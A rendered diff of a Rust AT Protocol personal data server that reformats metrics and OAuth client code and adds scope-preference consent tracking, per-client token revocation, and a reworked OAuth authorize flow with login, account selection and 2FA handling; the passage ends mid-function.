··· 1 - use tranquil_pds::comms::{CommsService, DiscordSender, EmailSender, SignalSender, TelegramSender}; 2 - use tranquil_pds::crawlers::{Crawlers, start_crawlers_service}; 3 - use tranquil_pds::state::AppState; 4 use std::net::SocketAddr; 5 use std::process::ExitCode; 6 use std::sync::Arc; 7 use tokio::sync::watch; 8 use tracing::{error, info, warn}; 9 10 #[tokio::main] 11 async fn main() -> ExitCode {
··· 1 use std::net::SocketAddr; 2 use std::process::ExitCode; 3 use std::sync::Arc; 4 use tokio::sync::watch; 5 use tracing::{error, info, warn}; 6 + use tranquil_pds::comms::{CommsService, DiscordSender, EmailSender, SignalSender, TelegramSender}; 7 + use tranquil_pds::crawlers::{Crawlers, start_crawlers_service}; 8 + use tranquil_pds::state::AppState; 9 10 #[tokio::main] 11 async fn main() -> ExitCode {
+20 -10
src/metrics.rs
··· 24 } 25 26 fn describe_metrics() { 27 - metrics::describe_counter!("tranquil_pds_http_requests_total", "Total number of HTTP requests"); 28 metrics::describe_histogram!( 29 "tranquil_pds_http_request_duration_seconds", 30 "HTTP request duration in seconds" ··· 61 "tranquil_pds_rate_limit_rejections_total", 62 "Total number of rate limit rejections" 63 ); 64 - metrics::describe_counter!("tranquil_pds_db_queries_total", "Total number of database queries"); 65 metrics::describe_histogram!( 66 "tranquil_pds_db_query_duration_seconds", 67 "Database query duration in seconds" ··· 116 117 fn normalize_path(path: &str) -> String { 118 if path.starts_with("/xrpc/") 119 - && let Some(method) = path.strip_prefix("/xrpc/") { 120 - if let Some(q) = method.find('?') { 121 - return format!("/xrpc/{}", &method[..q]); 122 - } 123 - return path.to_string(); 124 } 125 126 if path.starts_with("/u/") && path.ends_with("/did.json") { 127 return "/u/{handle}/did.json".to_string(); ··· 135 } 136 137 pub fn record_auth_cache_hit(cache_type: &str) { 138 - counter!("tranquil_pds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1); 139 } 140 141 pub fn record_auth_cache_miss(cache_type: &str) { 142 - counter!("tranquil_pds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1); 143 } 144 145 pub fn set_firehose_subscribers(count: usize) { ··· 172 } 173 174 pub fn record_rate_limit_rejection(limiter: &str) { 175 - counter!("tranquil_pds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1); 176 } 177 178 pub fn record_db_query(query_type: &str, duration_seconds: f64) {
··· 24 } 25 26 fn describe_metrics() { 27 + metrics::describe_counter!( 28 + "tranquil_pds_http_requests_total", 29 + "Total number of HTTP requests" 30 + ); 31 metrics::describe_histogram!( 32 "tranquil_pds_http_request_duration_seconds", 33 "HTTP request duration in seconds" ··· 64 "tranquil_pds_rate_limit_rejections_total", 65 "Total number of rate limit rejections" 66 ); 67 + metrics::describe_counter!( 68 + "tranquil_pds_db_queries_total", 69 + "Total number of database queries" 70 + ); 71 metrics::describe_histogram!( 72 "tranquil_pds_db_query_duration_seconds", 73 "Database query duration in seconds" ··· 122 123 fn normalize_path(path: &str) -> String { 124 if path.starts_with("/xrpc/") 125 + && let Some(method) = path.strip_prefix("/xrpc/") 126 + { 127 + if let Some(q) = method.find('?') { 128 + return format!("/xrpc/{}", &method[..q]); 129 } 130 + return path.to_string(); 131 + } 132 133 if path.starts_with("/u/") && path.ends_with("/did.json") { 134 return "/u/{handle}/did.json".to_string(); ··· 142 } 143 144 pub fn record_auth_cache_hit(cache_type: &str) { 145 + counter!("tranquil_pds_auth_cache_hits_total", "cache_type" => cache_type.to_string()) 146 + .increment(1); 147 } 148 149 pub fn record_auth_cache_miss(cache_type: &str) { 150 + counter!("tranquil_pds_auth_cache_misses_total", "cache_type" => cache_type.to_string()) 151 + .increment(1); 152 } 153 154 pub fn set_firehose_subscribers(count: usize) { ··· 181 } 182 183 pub fn record_rate_limit_rejection(limiter: &str) { 184 + counter!("tranquil_pds_rate_limit_rejections_total", "limiter" => limiter.to_string()) 185 + .increment(1); 186 } 187 188 pub fn record_db_query(query_type: &str, duration_seconds: f64) {
+36 -32
src/oauth/client.rs
··· 135 { 136 let cache = self.cache.read().await; 137 if let Some(cached) = cache.get(client_id) 138 - && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 139 - return Ok(cached.metadata.clone()); 140 - } 141 } 142 let metadata = self.fetch_metadata(client_id).await?; 143 { ··· 168 { 169 let cache = self.jwks_cache.read().await; 170 if let Some(cached) = cache.get(jwks_uri) 171 - && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 172 - return Ok(cached.jwks.clone()); 173 - } 174 } 175 let jwks = self.fetch_jwks(jwks_uri).await?; 176 { ··· 190 if !jwks_uri.starts_with("https://") 191 && (!jwks_uri.starts_with("http://") 192 || (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))) 193 - { 194 - return Err(OAuthError::InvalidClient( 195 - "jwks_uri must use https (except for localhost)".to_string(), 196 - )); 197 - } 198 let response = self 199 .http_client 200 .get(jwks_uri) ··· 302 return Ok(()); 303 } 304 if Self::is_loopback_client(&metadata.client_id) 305 - && let Ok(req_url) = reqwest::Url::parse(redirect_uri) { 306 - let req_host = req_url.host_str().unwrap_or(""); 307 - let is_loopback_redirect = req_url.scheme() == "http" 308 - && (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]"); 309 - if is_loopback_redirect { 310 - for registered in &metadata.redirect_uris { 311 - if let Ok(reg_url) = reqwest::Url::parse(registered) { 312 - let reg_host = reg_url.host_str().unwrap_or(""); 313 - let hosts_match = (req_host == "localhost" && reg_host == "localhost") 314 - || (req_host == "127.0.0.1" && reg_host == "127.0.0.1") 315 - || (req_host == "[::1]" && reg_host == "[::1]") 316 - || (req_host == "localhost" && reg_host == "127.0.0.1") 317 - || (req_host == "127.0.0.1" && reg_host == "localhost"); 318 - if hosts_match && req_url.path() == reg_url.path() { 319 - return Ok(()); 320 - } 321 } 322 } 323 } 324 } 325 Err(OAuthError::InvalidRequest( 326 "redirect_uri not registered for client".to_string(), 327 )) ··· 501 )); 502 } 503 if let Some(iat) = iat 504 - && iat > now + 60 { 505 - return Err(OAuthError::InvalidClient( 506 - "client_assertion iat is in the future".to_string(), 507 - )); 508 - } 509 let jwks = cache.get_jwks(metadata).await?; 510 let keys = jwks 511 .get("keys")
··· 135 { 136 let cache = self.cache.read().await; 137 if let Some(cached) = cache.get(client_id) 138 + && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs 139 + { 140 + return Ok(cached.metadata.clone()); 141 + } 142 } 143 let metadata = self.fetch_metadata(client_id).await?; 144 { ··· 169 { 170 let cache = self.jwks_cache.read().await; 171 if let Some(cached) = cache.get(jwks_uri) 172 + && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs 173 + { 174 + return Ok(cached.jwks.clone()); 175 + } 176 } 177 let jwks = self.fetch_jwks(jwks_uri).await?; 178 { ··· 192 if !jwks_uri.starts_with("https://") 193 && (!jwks_uri.starts_with("http://") 194 || (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))) 195 + { 196 + return Err(OAuthError::InvalidClient( 197 + "jwks_uri must use https (except for localhost)".to_string(), 198 + )); 199 + } 200 let response = self 201 .http_client 202 .get(jwks_uri) ··· 304 return Ok(()); 305 } 306 if Self::is_loopback_client(&metadata.client_id) 307 + && let Ok(req_url) = reqwest::Url::parse(redirect_uri) 308 + { 309 + let req_host = req_url.host_str().unwrap_or(""); 310 + let is_loopback_redirect = req_url.scheme() == "http" 311 + && (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]"); 312 + if is_loopback_redirect { 313 + for registered in &metadata.redirect_uris { 314 + if let Ok(reg_url) = reqwest::Url::parse(registered) { 315 + let reg_host = reg_url.host_str().unwrap_or(""); 316 + let hosts_match = (req_host == "localhost" && reg_host == "localhost") 317 + || (req_host == "127.0.0.1" && reg_host == "127.0.0.1") 318 + || (req_host == "[::1]" && reg_host == "[::1]") 319 + || (req_host == "localhost" && reg_host == "127.0.0.1") 320 + || (req_host == "127.0.0.1" && reg_host == "localhost"); 321 + if hosts_match && req_url.path() == reg_url.path() { 322 + return Ok(()); 323 } 324 } 325 } 326 } 327 + } 328 Err(OAuthError::InvalidRequest( 329 "redirect_uri not registered for client".to_string(), 330 )) ··· 504 )); 505 } 506 if let Some(iat) = iat 507 + && iat > now + 60 508 + { 509 + return Err(OAuthError::InvalidClient( 510 + "client_assertion iat is in the future".to_string(), 511 + )); 512 + } 513 let jwks = cache.get_jwks(metadata).await?; 514 let keys = jwks 515 .get("keys")
+8 -2
src/oauth/db/mod.rs
··· 3 mod dpop; 4 mod helpers; 5 mod request; 6 mod token; 7 mod two_factor; 8 ··· 15 pub use request::{ 16 consume_authorization_request_by_code, create_authorization_request, 17 delete_authorization_request, delete_expired_authorization_requests, get_authorization_request, 18 - update_authorization_request, 19 }; 20 pub use token::{ 21 check_refresh_token_used, count_tokens_for_user, create_token, delete_oldest_tokens_for_user, 22 delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id, 23 - get_token_by_refresh_token, list_tokens_for_user, rotate_token, 24 }; 25 pub use two_factor::{ 26 TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges,
··· 3 mod dpop; 4 mod helpers; 5 mod request; 6 + mod scope_preference; 7 mod token; 8 mod two_factor; 9 ··· 16 pub use request::{ 17 consume_authorization_request_by_code, create_authorization_request, 18 delete_authorization_request, delete_expired_authorization_requests, get_authorization_request, 19 + mark_request_authenticated, set_authorization_did, update_authorization_request, 20 + update_request_scope, 21 + }; 22 + pub use scope_preference::{ 23 + ScopePreference, delete_scope_preferences, get_scope_preferences, should_show_consent, 24 + upsert_scope_preferences, 25 }; 26 pub use token::{ 27 check_refresh_token_used, count_tokens_for_user, create_token, delete_oldest_tokens_for_user, 28 delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id, 29 + get_token_by_refresh_token, list_tokens_for_user, revoke_tokens_for_client, rotate_token, 30 }; 31 pub use two_factor::{ 32 TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges,
+61
src/oauth/db/request.rs
··· 67 } 68 } 69 70 pub async fn update_authorization_request( 71 pool: &PgPool, 72 request_id: &str, ··· 151 .await?; 152 Ok(result.rows_affected()) 153 }
··· 67 } 68 } 69 70 + pub async fn set_authorization_did( 71 + pool: &PgPool, 72 + request_id: &str, 73 + did: &str, 74 + device_id: Option<&str>, 75 + ) -> Result<(), OAuthError> { 76 + sqlx::query!( 77 + r#" 78 + UPDATE oauth_authorization_request 79 + SET did = $2, device_id = $3 80 + WHERE id = $1 81 + "#, 82 + request_id, 83 + did, 84 + device_id 85 + ) 86 + .execute(pool) 87 + .await?; 88 + Ok(()) 89 + } 90 + 91 pub async fn update_authorization_request( 92 pool: &PgPool, 93 request_id: &str, ··· 172 .await?; 173 Ok(result.rows_affected()) 174 } 175 + 176 + pub async fn mark_request_authenticated( 177 + pool: &PgPool, 178 + request_id: &str, 179 + did: &str, 180 + device_id: Option<&str>, 181 + ) -> Result<(), OAuthError> { 182 + sqlx::query!( 183 + r#" 184 + UPDATE oauth_authorization_request 185 + SET did = $2, device_id = $3 186 + WHERE id = $1 187 + "#, 188 + request_id, 189 + did, 190 + device_id 191 + ) 192 + .execute(pool) 193 + .await?; 194 + Ok(()) 195 + } 196 + 197 + pub async fn update_request_scope( 198 + pool: &PgPool, 199 + request_id: &str, 200 + scope: &str, 201 + ) -> Result<(), OAuthError> { 202 + sqlx::query!( 203 + r#" 204 + UPDATE oauth_authorization_request 205 + SET parameters = jsonb_set(parameters, '{scope}', to_jsonb($2::text)) 206 + WHERE id = $1 207 + "#, 208 + request_id, 209 + scope 210 + ) 211 + .execute(pool) 212 + .await?; 213 + Ok(()) 214 + }
+103
src/oauth/db/scope_preference.rs
···
··· 1 + use super::super::OAuthError; 2 + use serde::{Deserialize, Serialize}; 3 + use sqlx::PgPool; 4 + 5 + #[derive(Debug, Clone, Serialize, Deserialize)] 6 + pub struct ScopePreference { 7 + pub scope: String, 8 + pub granted: bool, 9 + } 10 + 11 + pub async fn get_scope_preferences( 12 + pool: &PgPool, 13 + did: &str, 14 + client_id: &str, 15 + ) -> Result<Vec<ScopePreference>, OAuthError> { 16 + let rows = sqlx::query!( 17 + r#" 18 + SELECT scope, granted FROM oauth_scope_preference 19 + WHERE did = $1 AND client_id = $2 20 + "#, 21 + did, 22 + client_id 23 + ) 24 + .fetch_all(pool) 25 + .await?; 26 + 27 + Ok(rows 28 + .into_iter() 29 + .map(|r| ScopePreference { 30 + scope: r.scope, 31 + granted: r.granted, 32 + }) 33 + .collect()) 34 + } 35 + 36 + pub async fn upsert_scope_preferences( 37 + pool: &PgPool, 38 + did: &str, 39 + client_id: &str, 40 + prefs: &[ScopePreference], 41 + ) -> Result<(), OAuthError> { 42 + for pref in prefs { 43 + sqlx::query!( 44 + r#" 45 + INSERT INTO oauth_scope_preference (did, client_id, scope, granted, created_at, updated_at) 46 + VALUES ($1, $2, $3, $4, NOW(), NOW()) 47 + ON CONFLICT (did, client_id, scope) DO UPDATE SET granted = $4, updated_at = NOW() 48 + "#, 49 + did, 50 + client_id, 51 + pref.scope, 52 + pref.granted 53 + ) 54 + .execute(pool) 55 + .await?; 56 + } 57 + Ok(()) 58 + } 59 + 60 + pub async fn should_show_consent( 61 + pool: &PgPool, 62 + did: &str, 63 + client_id: &str, 64 + requested_scopes: &[String], 65 + ) -> Result<bool, OAuthError> { 66 + if requested_scopes.is_empty() { 67 + return Ok(false); 68 + } 69 + 70 + let stored_prefs = get_scope_preferences(pool, did, client_id).await?; 71 + if stored_prefs.is_empty() { 72 + return Ok(true); 73 + } 74 + 75 + let stored_scopes: std::collections::HashSet<&str> = 76 + stored_prefs.iter().map(|p| p.scope.as_str()).collect(); 77 + 78 + for scope in requested_scopes { 79 + if !stored_scopes.contains(scope.as_str()) { 80 + return Ok(true); 81 + } 82 + } 83 + 84 + Ok(false) 85 + } 86 + 87 + pub async fn delete_scope_preferences( 88 + pool: &PgPool, 89 + did: &str, 90 + client_id: &str, 91 + ) -> Result<(), OAuthError> { 92 + sqlx::query!( 93 + r#" 94 + DELETE FROM oauth_scope_preference 95 + WHERE did = $1 AND client_id = $2 96 + "#, 97 + did, 98 + client_id 99 + ) 100 + .execute(pool) 101 + .await?; 102 + Ok(()) 103 + }
+15
src/oauth/db/token.rs
··· 268 } 269 Ok(()) 270 }
··· 268 } 269 Ok(()) 270 } 271 + 272 + pub async fn revoke_tokens_for_client( 273 + pool: &PgPool, 274 + did: &str, 275 + client_id: &str, 276 + ) -> Result<u64, OAuthError> { 277 + let result = sqlx::query!( 278 + "DELETE FROM oauth_token WHERE did = $1 AND client_id = $2", 279 + did, 280 + client_id 281 + ) 282 + .execute(pool) 283 + .await?; 284 + Ok(result.rows_affected()) 285 + }
+757 -273
src/oauth/endpoints/authorize.rs
··· 1 use crate::comms::{CommsChannel, channel_display_name, enqueue_2fa_code}; 2 use crate::oauth::{ 3 - Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, client::ClientMetadataCache, db, templates, 4 }; 5 use crate::state::{AppState, RateLimitKind}; 6 use axum::{ 7 - Form, Json, 8 extract::{Query, State}, 9 http::{ 10 HeaderMap, StatusCode, 11 header::{LOCATION, SET_COOKIE}, 12 }, 13 - response::{Html, IntoResponse, Redirect, Response}, 14 }; 15 use chrono::Utc; 16 use serde::{Deserialize, Serialize}; ··· 23 (StatusCode::SEE_OTHER, [(LOCATION, uri.to_string())]).into_response() 24 } 25 26 fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 27 headers 28 .get("cookie") ··· 41 fn extract_client_ip(headers: &HeaderMap) -> String { 42 if let Some(forwarded) = headers.get("x-forwarded-for") 43 && let Ok(value) = forwarded.to_str() 44 - && let Some(first_ip) = value.split(',').next() { 45 - return first_ip.trim().to_string(); 46 - } 47 if let Some(real_ip) = headers.get("x-real-ip") 48 - && let Ok(value) = real_ip.to_str() { 49 - return value.trim().to_string(); 50 - } 51 "0.0.0.0".to_string() 52 } 53 ··· 115 None => { 116 if wants_json(&headers) { 117 return ( 118 - axum::http::StatusCode::BAD_REQUEST, 119 Json(serde_json::json!({ 120 "error": "invalid_request", 121 "error_description": "Missing request_uri parameter. Use PAR to initiate authorization." 122 })), 123 ).into_response(); 124 } 125 - return ( 126 - axum::http::StatusCode::BAD_REQUEST, 127 - Html(templates::error_page( 128 - "invalid_request", 129 - Some("Missing request_uri parameter. Use PAR to initiate authorization."), 130 - )), 131 - ) 132 - .into_response(); 133 } 134 }; 135 let request_data = match db::get_authorization_request(&state.db, &request_uri).await { ··· 137 Ok(None) => { 138 if wants_json(&headers) { 139 return ( 140 - axum::http::StatusCode::BAD_REQUEST, 141 Json(serde_json::json!({ 142 "error": "invalid_request", 143 "error_description": "Invalid or expired request_uri. Please start a new authorization request." 144 })), 145 ).into_response(); 146 } 147 - return ( 148 - axum::http::StatusCode::BAD_REQUEST, 149 - Html(templates::error_page( 150 - "invalid_request", 151 - Some( 152 - "Invalid or expired request_uri. Please start a new authorization request.", 153 - ), 154 - )), 155 - ) 156 - .into_response(); 157 } 158 Err(e) => { 159 if wants_json(&headers) { 160 return ( 161 - axum::http::StatusCode::INTERNAL_SERVER_ERROR, 162 Json(serde_json::json!({ 163 "error": "server_error", 164 "error_description": format!("Database error: {:?}", e) ··· 166 ) 167 .into_response(); 168 } 169 - return ( 170 - axum::http::StatusCode::INTERNAL_SERVER_ERROR, 171 - Html(templates::error_page( 172 - "server_error", 173 - Some(&format!("Database error: {:?}", e)), 174 - )), 175 - ) 176 - .into_response(); 177 } 178 }; 179 if request_data.expires_at < Utc::now() { 180 let _ = db::delete_authorization_request(&state.db, &request_uri).await; 181 if wants_json(&headers) { 182 return ( 183 - axum::http::StatusCode::BAD_REQUEST, 184 Json(serde_json::json!({ 185 "error": "invalid_request", 186 "error_description": "Authorization request has expired. Please start a new request." 187 })), 188 ).into_response(); 189 } 190 - return ( 191 - axum::http::StatusCode::BAD_REQUEST, 192 - Html(templates::error_page( 193 - "invalid_request", 194 - Some("Authorization request has expired. Please start a new request."), 195 - )), 196 - ) 197 - .into_response(); 198 } 199 let client_cache = ClientMetadataCache::new(3600); 200 let client_name = client_cache ··· 216 let force_new_account = query.new_account.unwrap_or(false); 217 if !force_new_account 218 && let Some(device_id) = extract_device_cookie(&headers) 219 - && let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await 220 - && !accounts.is_empty() { 221 - let device_accounts: Vec<DeviceAccount> = accounts 222 - .into_iter() 223 - .map(|row| DeviceAccount { 224 - did: row.did, 225 - handle: row.handle, 226 - email: row.email, 227 - last_used_at: row.last_used_at, 228 - }) 229 - .collect(); 230 - return Html(templates::account_selector_page( 231 - &request_data.parameters.client_id, 232 - client_name.as_deref(), 233 - &request_uri, 234 - &device_accounts, 235 - )) 236 - .into_response(); 237 - } 238 - Html(templates::login_page( 239 - &request_data.parameters.client_id, 240 - client_name.as_deref(), 241 - request_data.parameters.scope.as_deref(), 242 - &request_uri, 243 - None, 244 - request_data.parameters.login_hint.as_deref(), 245 )) 246 - .into_response() 247 } 248 249 pub async fn authorize_get_json( ··· 272 })) 273 } 274 275 pub async fn authorize_post( 276 State(state): State<AppState>, 277 headers: HeaderMap, 278 - Form(form): Form<AuthorizeSubmit>, 279 ) -> Response { 280 let json_response = wants_json(&headers); 281 let client_ip = extract_client_ip(&headers); ··· 294 ) 295 .into_response(); 296 } 297 - return ( 298 - axum::http::StatusCode::TOO_MANY_REQUESTS, 299 - Html(templates::error_page( 300 - "RateLimitExceeded", 301 - Some("Too many login attempts. Please try again later."), 302 - )), 303 - ) 304 - .into_response(); 305 } 306 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 307 Ok(Some(data)) => data, ··· 316 ) 317 .into_response(); 318 } 319 - return Html(templates::error_page( 320 "invalid_request", 321 - Some("Invalid or expired request_uri. Please start a new authorization request."), 322 - )) 323 - .into_response(); 324 } 325 Err(e) => { 326 if json_response { ··· 333 ) 334 .into_response(); 335 } 336 - return Html(templates::error_page( 337 - "server_error", 338 - Some(&format!("Database error: {:?}", e)), 339 - )) 340 - .into_response(); 341 } 342 }; 343 if request_data.expires_at < Utc::now() { ··· 352 ) 353 .into_response(); 354 } 355 - return Html(templates::error_page( 356 "invalid_request", 357 - Some("Authorization request has expired. Please start a new request."), 358 - )) 359 - .into_response(); 360 } 361 - let client_cache = ClientMetadataCache::new(3600); 362 - let client_name = client_cache 363 - .get(&request_data.parameters.client_id) 364 - .await 365 - .ok() 366 - .and_then(|m| m.client_name); 367 let show_login_error = |error_msg: &str, json: bool| -> Response { 368 if json { 369 return ( ··· 375 ) 376 .into_response(); 377 } 378 - Html(templates::login_page( 379 - &request_data.parameters.client_id, 380 - client_name.as_deref(), 381 - request_data.parameters.scope.as_deref(), 382 - &form.request_uri, 383 - Some(error_msg), 384 - Some(&form.username), 385 )) 386 - .into_response() 387 }; 388 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 389 let normalized_username = form.username.trim(); ··· 419 { 420 Ok(Some(u)) => u, 421 Ok(None) => { 422 - let _ = bcrypt::verify(&form.password, "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK"); 423 return show_login_error("Invalid handle/email or password.", json_response); 424 } 425 Err(_) => return show_login_error("An error occurred. Please try again.", json_response), ··· 435 || user.telegram_verified 436 || user.signal_verified; 437 if !is_verified { 438 - return show_login_error("Please verify your account before logging in.", json_response); 439 } 440 let password_valid = match bcrypt::verify(&form.password, &user.password_hash) { 441 Ok(valid) => valid, ··· 460 ); 461 } 462 let channel_name = channel_display_name(user.preferred_comms_channel); 463 - let redirect_url = format!( 464 - "/oauth/authorize/2fa?request_uri={}&channel={}", 465 url_encode(&form.request_uri), 466 url_encode(channel_name) 467 - ); 468 - return Redirect::temporary(&redirect_url).into_response(); 469 } 470 Err(_) => { 471 return show_login_error("An error occurred. Please try again.", json_response); 472 } 473 } 474 } 475 - let code = Code::generate(); 476 let mut device_id: Option<String> = extract_device_cookie(&headers); 477 let mut new_cookie: Option<String> = None; 478 if form.remember_device { ··· 497 }; 498 let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await; 499 } 500 if db::update_authorization_request( 501 &state.db, 502 &form.request_uri, ··· 513 &request_data.parameters.redirect_uri, 514 &code.0, 515 request_data.parameters.state.as_deref(), 516 ); 517 - if let Some(cookie) = new_cookie { 518 ( 519 StatusCode::SEE_OTHER, 520 [(SET_COOKIE, cookie), (LOCATION, redirect_url)], ··· 528 pub async fn authorize_select( 529 State(state): State<AppState>, 530 headers: HeaderMap, 531 - Form(form): Form<AuthorizeSelectSubmit>, 532 ) -> Response { 533 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 534 Ok(Some(data)) => data, 535 Ok(None) => { 536 - return Html(templates::error_page( 537 "invalid_request", 538 - Some("Invalid or expired request_uri. Please start a new authorization request."), 539 - )) 540 - .into_response(); 541 } 542 Err(_) => { 543 - return Html(templates::error_page( 544 "server_error", 545 - Some("An error occurred. Please try again."), 546 - )) 547 - .into_response(); 548 } 549 }; 550 if request_data.expires_at < Utc::now() { 551 let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 552 - return Html(templates::error_page( 553 "invalid_request", 554 - Some("Authorization request has expired. Please start a new request."), 555 - )) 556 - .into_response(); 557 } 558 let device_id = match extract_device_cookie(&headers) { 559 Some(id) => id, 560 None => { 561 - return Html(templates::error_page( 562 "invalid_request", 563 - Some("No device session found. Please sign in."), 564 - )) 565 - .into_response(); 566 } 567 }; 568 let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await { 569 Ok(valid) => valid, 570 Err(_) => { 571 - return Html(templates::error_page( 572 "server_error", 573 - Some("An error occurred. Please try again."), 574 - )) 575 - .into_response(); 576 } 577 }; 578 if !account_valid { 579 - return Html(templates::error_page( 580 "access_denied", 581 - Some("This account is not available on this device. Please sign in."), 582 - )) 583 - .into_response(); 584 } 585 let user = match sqlx::query!( 586 r#" ··· 597 { 598 Ok(Some(u)) => u, 599 Ok(None) => { 600 - return Html(templates::error_page( 601 "access_denied", 602 - Some("Account not found. Please sign in."), 603 - )).into_response(); 604 } 605 Err(_) => { 606 - return Html(templates::error_page( 607 "server_error", 608 - Some("An error occurred. Please try again."), 609 - )).into_response(); 610 } 611 }; 612 let is_verified = user.email_verified ··· 614 || user.telegram_verified 615 || user.signal_verified; 616 if !is_verified { 617 - return Html(templates::error_page( 618 "access_denied", 619 - Some("Please verify your account before logging in."), 620 - )) 621 - .into_response(); 622 } 623 if user.two_factor_enabled { 624 let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; ··· 636 ); 637 } 638 let channel_name = channel_display_name(user.preferred_comms_channel); 639 - let redirect_url = format!( 640 - "/oauth/authorize/2fa?request_uri={}&channel={}", 641 - url_encode(&form.request_uri), 642 - url_encode(channel_name) 643 - ); 644 - return Redirect::temporary(&redirect_url).into_response(); 645 } 646 Err(_) => { 647 - return Html(templates::error_page( 648 "server_error", 649 - Some("An error occurred. Please try again."), 650 - )) 651 - .into_response(); 652 } 653 } 654 } ··· 664 .await 665 .is_err() 666 { 667 - return Html(templates::error_page( 668 "server_error", 669 - Some("An error occurred. Please try again."), 670 - )) 671 - .into_response(); 672 } 673 let redirect_url = build_success_redirect( 674 &request_data.parameters.redirect_uri, 675 &code.0, 676 request_data.parameters.state.as_deref(), 677 ); 678 - redirect_see_other(&redirect_url) 679 } 680 681 - fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String { 682 let mut redirect_url = redirect_uri.to_string(); 683 - let separator = if redirect_url.contains('?') { '&' } else { '?' }; 684 redirect_url.push(separator); 685 redirect_url.push_str(&format!("code={}", url_encode(code))); 686 if let Some(req_state) = state { ··· 702 703 pub async fn authorize_deny( 704 State(state): State<AppState>, 705 - Form(form): Form<AuthorizeDenyForm>, 706 - ) -> Result<Response, OAuthError> { 707 - let request_data = db::get_authorization_request(&state.db, &form.request_uri) 708 - .await? 709 - .ok_or_else(|| OAuthError::InvalidRequest("Invalid request_uri".to_string()))?; 710 - db::delete_authorization_request(&state.db, &form.request_uri).await?; 711 let redirect_uri = &request_data.parameters.redirect_uri; 712 let mut redirect_url = redirect_uri.to_string(); 713 let separator = if redirect_url.contains('?') { '&' } else { '?' }; ··· 717 if let Some(state) = &request_data.parameters.state { 718 redirect_url.push_str(&format!("&state={}", url_encode(state))); 719 } 720 - Ok(redirect_see_other(&redirect_url)) 721 } 722 723 #[derive(Debug, Deserialize)] ··· 746 let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await { 747 Ok(Some(c)) => c, 748 Ok(None) => { 749 - return Html(templates::error_page( 750 "invalid_request", 751 - Some("No 2FA challenge found. Please start over."), 752 - )) 753 - .into_response(); 754 } 755 Err(_) => { 756 - return Html(templates::error_page( 757 "server_error", 758 - Some("An error occurred. Please try again."), 759 - )) 760 - .into_response(); 761 } 762 }; 763 if challenge.expires_at < Utc::now() { 764 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 765 - return Html(templates::error_page( 766 "invalid_request", 767 - Some("2FA code has expired. Please start over."), 768 - )) 769 - .into_response(); 770 } 771 let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 772 Ok(Some(d)) => d, 773 Ok(None) => { 774 - return Html(templates::error_page( 775 "invalid_request", 776 - Some("Authorization request not found. Please start over."), 777 - )) 778 - .into_response(); 779 } 780 Err(_) => { 781 - return Html(templates::error_page( 782 "server_error", 783 - Some("An error occurred. Please try again."), 784 - )) 785 - .into_response(); 786 } 787 }; 788 let channel = query.channel.as_deref().unwrap_or("email"); 789 - Html(templates::two_factor_page( 790 - &query.request_uri, 791 - channel, 792 - None, 793 )) 794 .into_response() 795 } 796 797 pub async fn authorize_2fa_post( 798 State(state): State<AppState>, 799 headers: HeaderMap, 800 - Form(form): Form<Authorize2faSubmit>, 801 ) -> Response { 802 let client_ip = extract_client_ip(&headers); 803 if !state 804 .check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip) 805 .await 806 { 807 tracing::warn!(ip = %client_ip, "OAuth 2FA rate limit exceeded"); 808 - return ( 809 - axum::http::StatusCode::TOO_MANY_REQUESTS, 810 - Html(templates::error_page( 811 - "RateLimitExceeded", 812 - Some("Too many attempts. Please try again later."), 813 - )), 814 - ) 815 - .into_response(); 816 } 817 let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await { 818 Ok(Some(c)) => c, 819 Ok(None) => { 820 - return Html(templates::error_page( 821 "invalid_request", 822 - Some("No 2FA challenge found. Please start over."), 823 - )) 824 - .into_response(); 825 } 826 Err(_) => { 827 - return Html(templates::error_page( 828 "server_error", 829 - Some("An error occurred. Please try again."), 830 - )) 831 - .into_response(); 832 } 833 }; 834 if challenge.expires_at < Utc::now() { 835 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 836 - return Html(templates::error_page( 837 "invalid_request", 838 - Some("2FA code has expired. Please start over."), 839 - )) 840 - .into_response(); 841 } 842 if challenge.attempts >= MAX_2FA_ATTEMPTS { 843 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 844 - return Html(templates::error_page( 845 "access_denied", 846 - Some("Too many failed attempts. Please start over."), 847 - )) 848 - .into_response(); 849 } 850 let code_valid: bool = form 851 .code ··· 855 .into(); 856 if !code_valid { 857 let _ = db::increment_2fa_attempts(&state.db, challenge.id).await; 858 - let channel = match sqlx::query_scalar!( 859 - r#"SELECT preferred_comms_channel as "channel: CommsChannel" FROM users WHERE did = $1"#, 860 - challenge.did 861 - ) 862 - .fetch_optional(&state.db) 863 - .await 864 